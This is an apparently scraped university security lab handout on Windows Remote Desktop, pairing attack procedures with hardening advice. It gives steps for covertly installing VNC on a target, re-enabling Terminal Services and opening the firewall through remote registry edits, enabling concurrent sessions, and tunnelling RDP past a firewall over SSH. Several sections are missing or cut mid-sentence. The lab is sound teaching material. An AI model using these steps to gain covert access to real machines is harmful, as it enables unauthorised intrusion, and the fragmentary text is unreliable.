Download Lab Exercise: Hacking into Remote Desktop and Security Measures and more Lab Reports Electrical and Electronics Engineering in PDF only on Docsity!
ECE 4112 Internetwork Security
Lab X : Remote Desktop Hacking and Security
Group Number:_____________ Member Names: ______________________ _______________________ Date Assigned: December 06, 2007 Date Due: December 13, 2007 Last Edited: December 03, 2007 Lab Authored by: Raghav Chawla and Jon Ussery Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE the Date Due.
Goal: This lab will introduce you to the remote desktop functionality in windows.
RDP is extremely vulnerable and this makes it extremely easy to compromise the security of a PC through remote desktop. The lab will also talk about certain precautions and security measures that can be taken against these hacks.
Background and Theory: Remote Desktop is remote administration
software which runs on a foreign host’s server and is displayed locally. The Terminal Services application by Microsoft allows users to access data and applications on a remote computer. This is different from application streaming, as computations are processed on the remote pc. Terminal Services was introduced in Windows NT 4.0 but was vastly improved in Windows 2000. Vista has new developments as well such as clipboard and audio features. The difference between the client version and the server version of the Windows OS is that in client versions, only one user can be logged in at a time however, concurrent sessions are allowed in the server version. The remote desktop protocol (RDP) runs on port 3389. Keyboard and mouse inputs are transmitted via TCP connections. Virtual channels allow other devices to work (such as printers, audio, etc.). RDP also includes ActiveX control. There are various software distributions which allow for remote desktop functionality. Some of these are ‘Microsoft Remote Desktop Connection’, ‘Tight VNC’, ‘Apple
Remote Desktop’, and ‘GoToMyPC’ Different remote desktop software uses different security measures. We will see how to exploit certain inherent vulnerabilities in the remote desktop protocol. We will also learn how to secure our PCs against such attacks.
Prelab Questions: None
Lab Equipment: This lab will be using two windows machines. The user
can select one of the machines as the target and the other one as the local machine. Windows Remote Desktop and WINVNC are the two software distributions that will be used.
Section 1: Hacking into Remote Desktop
Requires: Regini.exe (http://www.dynawell.com/reskit/microsoft/win2000/regini.zip) and VNC software (from realvnc.com). This section assumes you can transfer files to the remote pc. From the local windows machine check if port 3389 is listening on the remote victim server (the second windows machine). If the terminal services aren’t available, install Virtual Network Computing on the victim machine. Copy the VNC executable and necessary files (WINVNC.EXE, VNCHooks.DLL and OMNITHREAD_RT.DLL) to the target sever. Question 1.1 : Why would it be a “good idea” for a hacker to put the files in a systemroot folder? One consideration is that newer versions of WINVNC add a small green icon to the system tray icon whenever the server is started. If started from the command line, versions equal or previous to 3.3.2 are more or less invisible to users interactively logged on. Once WINVNC is copied over, the VNC password needs to be set. Additionally, we need to tell WINVNC to listen for incoming connections, also set via the GUI. We’ll have to create a file called WINVNC.INI and enter specific registry changes we want. HKEY_USERS\ .DEFAULT\Software|ORL\WinVNC SocketConnect = REG_DWORD 0x Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e
- Open Regedit on the server.
- Select File - Connect Network registry
- Enter the name of the client machine and select "Check Name"
- At the bottom of your servers registry tree you will now see 2 hives appear.
- The Hkey_Local_Machine and the Hkey_Users under the client’s computer name.
- Goto hklm\system\currentcontrolset\control\terminal server
FdenyTSConnection= - Change the FdenyTSConnection to 0
- Attempt to logon on again Additional for Windows XP sp2: The Firewall blocks access on port 3389. Make sure to create/change the following Registry settings:
Hkey_Local_Machine\System\CurrentControlSet\Services\ SharedAccess\Parameters
FirewallPolicy\DomainProfile\GloballyOpenPorts\List“ substring:"3389:tcp" parameter:"3389:tcp:*:enabled:@xpsp2res.dll,-22009" Repeat the change in:"hkey_local_machine\system\currentcontrolset\services
sharedaccess\parameters\firewallpolicy\standardprofile” Question 2.1: How could you prevent something like this from happening? [Reference 2]
Section 3: Multiuser Remote Desktop Hack
Windows XP has several limitations. One of those being that it can only be controlled by one user at a time. Therefore only one physically present user, or one remote user, can be logged on at one time. Thus if someone logs into the computer from remote, the local user is disconnected. The following procedure deactivates this block and allows multiple persons to connect and to use a single computer remotely. This is a great way for a malicious user to repeatedly
click with right mouse button on blank space in the right part of the registry window, choose “New” > DWORD, name the new key “EnableConcurrentSessions” (without quotes), then edit it and set its value to 1; close the editor. STEP 5 Click Start, then “Run…”, type “gpedit.msc” (without quotes) and press ENTER; open Computer Configuration > Administrative Templates > Windows Components > Terminal Services;
double click “Limit number of connections”, choose “Enabled” and set the maximum number of concurrent connections you want to allow (2 or more), then Restart Windows in normal mode. STEP 6 Go back to Remote tab of My Computer’s properties (see step 1) and activate “Allow users to connect remotely to this computer”; Go back to “Terminal services” in “Services” (see step 2) and set its “Startup type” to “Manual” Now restart Windows. Your operating system should now be ready to accept multiple remote desktop connections. User accounts configuration is reachable in the control panel, and the list of users that can connect to the PC is editable in the remote tab of My computer. Question 3.1: Is there a way of knowing whether someone is logged on to your computer using remote desktop even after you have made these changes to his machine? [Reference 3]
Using Putty (a rockstar ssh client for Windows), you can easily set up a tunnel for accessing RDC on your firewalled server:
- Configure a new ssh session for the ssh server that you have access to (128.62.109.197 in this example). .
- In the connection/ssh/tunnels menu, add a new forwarded port. You'll need to set up a port on your own machine (this will be the virtual, forwarded connection to the remote RDC server), so use something unused, like 5800.
- In the destination field, enter the ip address and RDC port for the firewalled machine, Ie. <ip_address>:3389 (3389 is what RDC listens on)
Now save your session and connect to the SSH server At this point, you can connect to the remote server's RDC port via your local machine's port 5800. Everything that comes in and out of localhost:5800 will be transparently whisked away over the ssh connection, through the intermediary machine, to your destination server's port 3389. So instead of entering <ip_address>:3389 for your destination server in the remote desktop client, enter localhost:5800. It will go right through the firewall. Take a screenshot showing that you successfully configured SSH tunneling [Screenshot 2] Breaking Firewalls with OpenSSH and PuTTY - http://souptonuts.sourceforge.net/sshtips.htm Question 4.1: How can you prevent against this? [Reference 4]
Here, add only the users who you want to be able to log in remotely. Unfortunately for you, that setting didn't do a thing! You will find that you can still log on as any administrator account. To make things complicated, Microsoft defaults to the least secure setting possible while hiding this fact from the user. You will need to go to another location to change the real list. Click Start - Programs - Administrative Tools - Local Security Policy. If you can't find it, you can also do Start - Run - enter "%SystemRoot%\system32\secpol.msc /s" - Ok.
Under Local Policies - User Rights Assignment, there is a line that says "Allow logon through Terminal Services." And just next to it is "Administrators, Remote Desktop Users." Aha! Too bad it didn't show "Administrators" in the other screen. Double-click this setting and remove "Administrators." If you want an administrator to have access, just add them explicitly through the other screen.
2. Set an account lockout policy
There are already tools that will use brute-force to guess passwords and log-on remotely. You cannot stop this, but it can be minimized by setting an account lockout policy. If someone tries to guess the password, then after a few guesses they will be locked out for a period of time. This can make hours or days of guessing become centuries. That makes it infeasable to brute-force into your system. From the same Local Security Policy screen from before, go to Account Policies - Account Lockout Policy.
3. Require Passwords and 128-Bit Encryption
For compatibility with older, weaker, less-secure clients, Windows XP defaults to allowing minimal or no encryption on remote desktop connections. If you are connecting with older software, upgrade it. (If you were to connect with the PocketPC Terminal Services Client, then this setting wouldn’t work for you since that client does not support high encryption.) Click Start - Run - "%SystemRoot%\system32\gpedit.msc /s" to get to the Group Policy Editor. From here, go to Computer Configuration - Administrative Templates - Windows Components - Terminal Services - Encryption and Security.
You can change the "Set client connection encryption level" from "Not Configured" to "Enabled" and "High Level" to force the client to use 128-bit security. This protects your passwords as well as anything transmitted during your terminal service session. Enabling "Always prompt client for password upon connection" prevents the remote user from saving the password on the client computer and avoiding the password prompt. Saving passwords is generally a dangerous setting since the password is now on another computer, and because it allows the user to forget it.
4. Change the RDP port number
The Event Viewer logs failed login attempts and account lockouts. You can periodically check this to see if anyone is trying to get in. If your firewall keeps logs (Windows Firewall does) then you can use these to see when someone tries to connect. Opening TCP port 3389 from the Internet to your computer would probably be a bad idea as people aren’t necessarily looking for RDP connections on other ports. So, it is a good security measure to change the port RDP listens in on to a different port, then enabling connectivity to that port through the firewall You can also move the terminal services port from 3389 to another port by changing the registry key at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
WinStations\RDP-Tcp
Answer Sheet Lab X
Group Number: _______________ Member Names: _________________________ _________________________
Section 1: Hacking into Remote Desktop
Question 1.1 : Why would it be a “good idea” for a hacker to put the files in a systemroot folder?
Section 2: Connecting to remote desktop even
when this functionality is disabled
Question 2.1: How could you prevent something like this from happening?
Section 3: Multiuser Remote Desktop Hack
Question 3.1: Is there a way of knowing whether someone is logged on to your computer using remote desktop even after you have made these changes to his machine?
Section 4: Hacking remote Desktop Through
Firewall
Question 4.1: How can you prevent against this?
Section 5: Remote Desktop Security Measures
Question 5.1: What value did you choose for the lockout duration? Why? Question 5.2 How can you get rid of the vulnerability of Remote Desktop to man-in –the-middle attacks? How long did it take you to complete this lab? Was it an appropriate length lab?
